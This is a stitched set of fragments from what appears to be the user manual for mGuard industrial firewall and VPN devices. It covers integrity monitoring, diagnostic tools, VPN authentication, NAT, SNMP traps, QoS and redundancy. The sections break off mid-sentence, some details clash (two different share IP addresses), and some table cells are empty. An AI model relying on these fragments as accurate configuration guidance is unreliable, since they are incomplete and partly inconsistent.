Checksumdirectory (integrity checksum): Checksumdirectory is the directory and contains the files beginning with integrity checksum.

[Screenshot: CIFS Integrity Monitoring >> CIFS Integrity Checking >> Checked Share Management. Last Check: Summary: Last check finished successfully. Report: The location of the report is share C on 192.168.1.10, file integrity check log txt; the signature has not been verified yet. UNC notation of the imported share: share C on 192.166.1.10. Start of the check: Sunday, 13 April 2014, 15:50:46. Duration of the last check. Current check: Status: Currently no scan is performed. Possible Actions: Re-build the integrity database (perform this if the checked share's content has been changed; please note: this will erase an already existing integrity database intentionally); Cancel the current operation (please note: unless appointed otherwise, the next operation will be started at the time of the next regular check); a third action concerning the integrity database (please note: unless appointed otherwise, the integrity database will be re-created at the time of the next regular check)]

CIFS Integrity Monitoring >> CIFS Integrity Checking >> Settings >> Edit >> Management

Last check / Current check / Possible Actions: Summary, Report, UNC notation of the imported share, Start of the last check, Durat
under Management >> SNMP.

IPsec VPN: Lists all VPN events. The format corresponds to standard Linux format. There are special evaluation programs that present information from the logged data in a more easily readable format.

15 Support menu

15.1 Support >> Tools

15.1.1 Ping Check

[Screenshot: Support >> Tools, tabs Ping Check | Traceroute | DNS Lookup | IKE Ping. Ping Check: Hostname/IP Address: myServer]

Ping Check: Aim: to check whether a partner can be accessed via a network. Procedure: Enter the IP address or host name of the partner in the Hostname/IP Address field. Then click on Ping. A corresponding message is then displayed.

15.1.2 Traceroute

[Screenshot: Support >> Tools, tabs Ping Check | Traceroute | DNS Lookup | IKE Ping. Traceroute: Hostname/IP Address: myServer; checkbox "Do not resolve IP addresses to hostnames"]

Traceroute: Aim: to determine which intermediate points (or routers) are located on the connection path to a partner. Procedure: Enter the host name or IP address of the partner whose route is to be determined in the Hostname/IP Address field. If the points on the route are to be output with IP addresses instead of host names (if applicable), activate the "Do not resolve IP addresses to hostnames" checkbox. Then click on Trace. A corresponding message is then displayed.
up to 1000 active VPN channels. Hardware acceleration for encryption in the VPN tunnel (except for mGuard centerport).

Additional features: Remote Logging; Router/firewall redundancy (depending on the license); Administration using SNMP v1-v3 and Innominate Device Manager (mGuard device manager); PKI support for HTTPS/SSH remote access; Can act as an NTP and DNS server via the LAN interface; Compatible with MGUARD Secure Cloud; Plug'n'Protect technology; Tracking and time synchronization via GPS/GLONASS positioning system.

Support: In the event of problems with your mGuard, please contact your dealer. Additional information on the device as well as on release notes and software updates can be found on the Internet at www.innominate.com.

1.2 Typical application scenarios

This section describes various application scenarios for the mGuard: Stealth mode (Plug'n'Protect), Network router, DMZ (Demilitarized Zone), VPN gateway, WLAN via VPN tunnel, Resolving network conflicts, Mobile phone router via integrated mobile phone modem.

1.2.1 Stealth mode (Plug'n'Protect)

In stealth mode, the mGuard can be positioned between an individual computer and the rest of the network. The settings (e.g. for firewall and VPN) can be made using a web browser under the URL https://1.1.1.1. No configuration modifi
Default: empty field. The local VPN identifier can be used to specify the name the mGuard uses to identify itself to the partner. It must match the data in the machine certificate of the mGuard. Valid values: Empty, i.e. no entry (default): the Subject entry (previously Distinguished Name) in the machine certificate is then used. The Subject entry in the machine certificate. One of the Subject Alternative Names, if they are listed in the certificate. If the certificate contains Subject Alternative Names, these are specified under "Valid values are". These can include IP addresses, host names with @ prefix, or e-mail addresses.

Specifies what must be entered as a subject in the machine certificate of the VPN partner for the mGuard to accept this VPN partner as a communication partner. It is then possible to limit or enable access by VPN partners, which the mGuard would accept in principle based on certificate checks, as follows: Limited access to certain subjects (i.e. machines) and/or to subjects that have certain attributes, or Access enabled for all subjects. See "Subject, certificate" on page 360. Distinguished Name was previously used instead of Subject.

IPsec VPN >> Connections >> Edit >> Authentication

Access enabled for all subjects: If the Remote field is lef
route or differentiated routing settings (e.g. PLCs) without the corresponding settings. The corresponding settings must be made under 1:1 NAT. This method is also referred to as IP masquerading. Default settings: NAT is not active. If the mGuard is operated in PPPoE/PPTP mode, NAT must be activated in order to gain access to the Internet. If NAT is not activated, only VPN connections can be used. If multiple static IP addresses are used for the WAN port, the first IP address in the list is always used for IP masquerading. These rules do not apply in Stealth mode.

Outgoing on Interface: External / External 2 / Any External / Internal. Specifies via which interface the data packets are sent so that the rule applies to them. Any External refers to the External and External 2 interfaces.

Network >> NAT >> Masquerading / 1:1 NAT

Example: Masquerading is defined which applies for network data flows in Router mode. These data flows are initiated so that they lead to a destination device which can be accessed over the selected network interface on the mGuard. To do this, the mGuard replaces the IP address of the initiator with a suitable IP address of the selected network interface in all associated data packets. The effect is the same as for the other values of the same variables: the IP address of the initiator is hid
automatically saved to the ECS, i.e. the ECS always stores the profile currently used. The mGuard only uses the automatically stored configuration profiles upon startup if the original password "root" is still set on the mGuard for the root user (see "Loading a profile from an external storage medium" on page 78). Configuration changes are also made if the ECS is disconnected, full, or defective. The corresponding error messages are displayed in the Logging menu (see Logging >> Browse local logs). Activation of the new setting extends the response time of the user interface when changing any settings.

Management >> Configuration Profiles

Encrypt the data on the ECS / Load configuration from ECS during boot (only for mGuard rs4000/rs2000 3G, mGuard rs4000/rs2000, mGuard pci SD, mGuard pcie SD, mGuard delta, mGuard centerport): In the case of firmware 7.6.1 or later, the configuration storage (ECS) and configuration profile (ATV) can be encrypted. This makes the mGuard rollout easier. You can save several mGuard configurations on an SD card (on a USB stick in the case of mGuard centerport) and then use it to start up all mGuards. During the startup process, the mGuard finds the valid configurations on the configuration storage. This is loaded, decrypted, and used as a valid configuration. If Yes is selected, the configuration changes are e
Activate traps: Yes / No. enterprise-oid: mGuardInfo; generic-trap: linkUp / linkDown; specific-trap: 0. Sent when the connection to a port is interrupted (linkDown) or restored (linkUp).

Activate traps: Yes / No. enterprise-oid: mGuardInfo; generic-trap: coldStart; specific-trap: 0. Sent after a cold restart or warm start.

Activate traps: Yes / No. enterprise-oid: mGuard; generic-trap: enterpriseSpecific; specific-trap: mGuardHTTPSLoginTrap (1); additional: mGuardHTTPSLastAccessIP. This trap is sent if someone has tried (successfully or unsuccessfully, e.g. using an incorrect password) to open an HTTPS session. The trap contains the IP address from which the attempt was issued.

enterprise-oid: mGuard; generic-trap: enterpriseSpecific; specific-trap: mGuardShellLoginTrap (2); additional: mGuardShellLastAccessIP. This trap is sent when someone opens the shell via SSH or the serial interface. The trap contains the IP address of the login request. If this request was sent via the serial interface, the value is 0.0.0.0.

Management >> SNMP >> Trap

Hardware-related traps: Chassis (power, signal relay). mGuard rs4000/rs2000 3G, mGuard rs4000/rs2000, mGuard industrial rs, EAGLE mGuard only. enterprise-oid: mGuard; generic-trap: enterpriseSpecific; specific-trap: mGuardDHCPLastAcces
have registered with one of the DynDNS services supported by mGuard, you can enter the corresponding information in this dialog box. When using the mGuard rs4000/rs2000 3G, be aware that DynDNS is not permitted by all mobile network providers.

Register this mGuard at a DynDNS Service: Select Yes if you have registered with a DynDNS provider and if the mGuard is to use this service. The mGuard then reports its current IP address to the DynDNS service (i.e. the one assigned for its Internet connection by the Internet service provider).

Refresh Interval (sec): Default: 420 seconds. The mGuard informs the DynDNS service of its new IP address whenever the IP address of its Internet connection is changed. In addition, the device can also report its IP address at the interval specified here. This setting has no effect for some DynDNS providers, such as DynDNS.org, as too many updates can cause the account to be closed.

DynDNS Provider: The providers in this list support the same protocol as the mGuard. Select the name of the provider with whom you are registered, e.g. DynDNS.org, TinyDynDNS, DNS4BIZ. If your provider is not in the list, select DynDNS-compatible and enter the server and port for this provider.

DynDNS Server: Only visible when DynDNS Provider is set to DynDNS-compatible. Name of the server for the DynDNS provider.

Network >> DNS >>
prevent unauthorized access. The HTTPS server should only grant access to the configuration of this individual mGuard using the login and password specified. Otherwise, users of other mGuard devices could access this individual device. The IP address or the host name specified under Server must be the same as the server certificate's common name (CN). Self-signed certificates should not use the key usage extension.

To install a certificate, proceed as follows. Requirement: the certificate file must be saved on the connected computer. Click on Browse to select the file. Click on Import. By clicking on Test Download, you can test whether the specified parameters are correct without actually saving the modified parameters or activating the configuration profile. The result of the test is displayed in the right-hand column. Ensure that the profile on the server does not contain unwanted variables starting with GAI_PULL_, as these overwrite the applied configuration.

[Figure: service I/O connections: Input CMD 1, CMD 2, CMD 3; Signal contact (signal output), ACK 1/2; Alarm output, ACK 3]

4.7 Management >> Service I/O

This menu is only available on the mGuard rs4000/rs2000 3G, mGuard rs4000/rs2000, mGuard industrial rs. Service contacts (service I/Os) can be connected to some mGuards (mGuard rs4000/rs2000 3G, mGuard rs4000/rs2000, mGuard indu
prevent your own access being blocked, you may have to permit access simultaneously via another interface explicitly with Accept before clicking on the Apply button to activate the new setting. Otherwise, if your access is blocked, you must carry out the recovery procedure.

Management >> System Settings >> Shell Access

Action: Options: Accept means that the data packets may pass through. Reject means that the data packets are sent back and the sender is informed of their rejection. (In Stealth mode, Reject has the same effect as Drop.) Drop means that the data packets are not permitted to pass through. They are discarded, which means that the sender is not informed of their whereabouts.

Comment: Freely selectable comment for this rule.

Log: For each individual firewall rule, you can specify whether the use of the rule should be logged (set Log to Yes) or should not be logged (set Log to No, default setting).

RADIUS Authentication

Use RADIUS authentication for Shell access (this menu item is not included in the scope of functions for the mGuard rs2000 3G and mGuard rs2000): If set to No, the passwords of users who log in via shell access are checked via the
[Screenshot: log category checkboxes, including SNMP/LLDP, Network Security, CIFS AV Scan Connector, IPsec VPN]

The corresponding checkboxes for filtering entries according to their category are displayed below the log entries, depending on which mGuard functions were active. To display one or more categories, enable the checkboxes for the desired categories and click on Reload logs.

14.2.1 Log entry categories

Common: Log entries that cannot be assigned to other categories.

Network Security: In the case of the mGuard rs2000 and mGuard rs2000 3G, access via its firewall is not logged. Logged events are shown here if the logging of events was selected when defining the firewall rules (Log: Yes).

Log ID and number for tracing errors: Log entries that relate to the firewall rules listed below have a log ID and number. This log ID and number can be used to trace the firewall rule to which the corresponding log entry relates and that led to the corresponding event.

Firewall rules and their log ID:

Packet filters (Network Security >> Packet Filter >> Incoming Rules menu; Network Security >> Packet Filter >> Outgoing Rules menu): Log ID: fw-incoming or fw-outgoing

Firewall rules for VPN connections (IPsec VPN >> Connections >> Edit >> Firewall menu, Incoming / Outgoing): Log ID: vpn-fw-in or vpn-fw-out
whether the use of the rule should be logged (set Log to Yes) or should not be logged (set Log to No, default setting).

9 CIFS Integrity Monitoring menu

CIFS integrity monitoring is not available on the mGuard rs2000 3G. It must not be used on the mGuard blade controller. In Stealth network mode, CIFS integrity checking is not possible without a management IP address, and the CIFS server for the anti-virus scan is not supported.

There are two options for checking network drives for viruses using CIFS integrity monitoring: CIFS Integrity Checking and CIFS Antivirus Scan Connector.

CIFS Integrity Checking: When CIFS integrity checking is performed, the Windows network drives are checked to determine whether certain files (e.g. .exe, .dll) have been changed. Changes to these files indicate a possible virus or unauthorized intervention.

CIFS Antivirus Scan Connector: The CIFS Antivirus Scan Connector enables the mGuard to perform a virus scan on drives that are otherwise not externally accessible (e.g. production cells). The mGuard mirrors a drive externally in order to perform the virus scan. Additional anti-virus software is required for this procedure. Set the necessary read access for your anti-virus software.

Setting options for CIFS integrity checking: Which network drives are known to the mGuard (see CIFS Integrity Mo
which priority the affected queue should be processed, provided the total available bandwidth has not been exhausted.

Comment: Optional comment text.

12.4 Egress Rules

This page defines the rules for the data that is assigned to the defined egress queues (see above) in order for the data to be transmitted with the priority assigned to the relevant queue. Rules can be defined separately for all interfaces and for VPN connections.

12.4.1 Internal / External / External 2 / Dial-in

Internal settings for egress queue rules: [Screenshot: QoS >> Egress Rules >> Internal. Default Queue: Default. Rules (Protocol, From IP, To IP, Current TOS/DSCP, New TOS/DSCP, Queue): 1: All, 0.0.0.0/0 (any), 0.0.0.0/0 (any), TOS Minimize-Delay, Unchanged, Urgent; 2: All, 0.0.0.0/0 (any), 0.0.0.0/0 (any), TOS Maximize-Reliability, Unchanged, Important; 3: All, 0.0.0.0/0 (any), 0.0.0.0/0 (any), TOS Minimize-Cost, Unchanged, Low Priority]

External settings for egress queue rules: [Screenshot: QoS >> Egress Rules >> External. Default Queue: Default. Rules (Protocol, From IP, To IP, Current TOS/DSCP, New TOS/DSCP, Queue): 1: All, 0.0.0.0/0 (any), 0.0.0.0/0 (any), TOS Minimize-Delay, Unchanged, Urgent; 2: All, 0.0.0.0/0 (any), 0.0.0.0/0 (any), TOS Maximize-Reliability, Unchanged, Important; 3: cut off]
[Screenshot: Bandwidth Rate Limit: unlimited. Queues: 1: Urgent, High, unlimited; 2: Important, Medium, unlimited; 3: Default, Medium; 4: Low Priority, Low, unlimited]

12.3 Egress Queues (VPN)

12.3.1 VPN via Internal / VPN via External / VPN via External 2 / VPN via Dial-in

VPN via Internal settings for egress queues: [Screenshot: QoS >> Egress Queues (VPN) >> VPN via Internal. Enabling: Enable Egress QoS: No. Total Bandwidth Rate: Bandwidth Rate Limit: unlimited. Queues: Urgent (High), Important (Medium), Default (Medium), Low Priority (Low), each with a guaranteed value of 10 and an upper limit of unlimited]

VPN via External settings for egress queues: [Screenshot: QoS >> Egress Queues (VPN) >> VPN via External. Enabling: Enable Egress QoS: No. Total Bandwidth Rate: Bandwidth Rate Limit: unlimited. Queues: Urgent, Important, Default, Low Priority]

VPN via External 2 settings for egress queues: [Screenshot: QoS >> Egress Queues (VPN) >> VPN via External 2. Enabling: Enable Egress QoS: No. Total Bandwidth Rate: Bandwidth Rate Limit: unlimited. Queues: Urgent (High), Important (Medium), Default (Medium), Low Priority (Low), each with a guaranteed value of 10 and an upper limit of unlimited]
with serial interface. The mGuard platforms with a serial interface have an integrated COM server as of firmware 8.0 and later. This enables serial interface data exchange via an IP connection. Three options are available.

Additional settings for mGuard platforms with serial interface:

RFC 2217: Telnet server (complies with RFC 2217). In this mode, the serial interface can be configured via client software in the network. The Telnet server is available via the port which is defined under Local Port.

RAW client: In this mode, the mGuard initiates a connection to the address which is set under Remote IP address. The connection is established via the port which is configured under Remote Port. The interface can be configured here (Serial parameters). The settings of the serial console are used for the baud rate and the hardware handshake (see External Modem under Network >> Interfaces >> Modem/Console).

RAW server: Behaves in the same way as the RAW client. However, the RAW server responds to incoming connections via the port which is configured under Local Port.

[Screenshot: External Modem: Hardware handshake (RTS/CTS): Off; Baudrate: 57600; Handle modem transparently (for dial-in only); Modem init string: ATH OK. COM Server: Type: RAW server; Local port: 3001; Serial parameters: 1 stopbit, no parity]

Please note: On some platforms the serial port is not accessible. For
external interface, please configure a route for them.

If the operating mode of the secondary external interface is set to temporary, the following is checked using periodic ping tests: can a specific destination (or destinations) be reached when data packets take the route based on all the routing settings specified for the mGuard, apart from those specified for the secondary external interface? Only if none of the ping tests are successful does the mGuard assume that it is currently not possible to reach the destination(s) via the primary external interface (Ethernet interface or WAN port of the mGuard). In this case, the secondary external interface is activated, which results in the data packets being routed via this interface according to the routing setting for the secondary external interface. The secondary external interface remains activated until the mGuard detects in subsequent ping tests that the destination(s) can be reached again. If this condition is met, the data packets are routed via the primary external interface again and the secondary external interface is deactivated. Therefore, the purpose of the ongoing ping tests is to check whether specific destinations can be reached via the primary external interface. When they cannot be reached, the secondary external interface is activated until they can be reached again.

Type / Destination: Specify the ping Type of the ping request packet that the mGuard is to send to the dev
layer 2. The ICMP echo reply is the same size.

Table 16-2 shows the maximum frequency at which the presence notifications (CARP) are sent from the active mGuard. It also shows the bandwidth used in the process. The frequency depends on the mGuard priority and the fail-over switching time. Table 16-2 also shows the maximum latency tolerated by the mGuard for the network that is used to transmit the presence notifications (CARP). If this latency is exceeded, the redundant pair can exhibit undefined behavior.

Table 16-2: Frequency of the presence notifications (CARP)
Columns: Fail-over switching time | Presence notifications (CARP) per second, high priority | Presence notifications (CARP) per second, low priority | Maximum latency | Bandwidth on layer 2 for the high priority
Row 1: | 50 per second | 25 per second | | 37600 bps
Row 2: | 16.6 per second | 8.3 per second | | 12533 bps

16.1.6 Error compensation through firewall redundancy

Firewall redundancy is used to compensate for hardware failures.

[Figure 16-2: Possible error locations 1-8 (primary mGuard, secondary mGuard, internal network, external network)]

Figure 16-2 shows a diagram containing various error locations (not related to the network mode). Each of the mGuard devices in a redundant pair is located in a different area (A and B). The mGuard in area A is connecte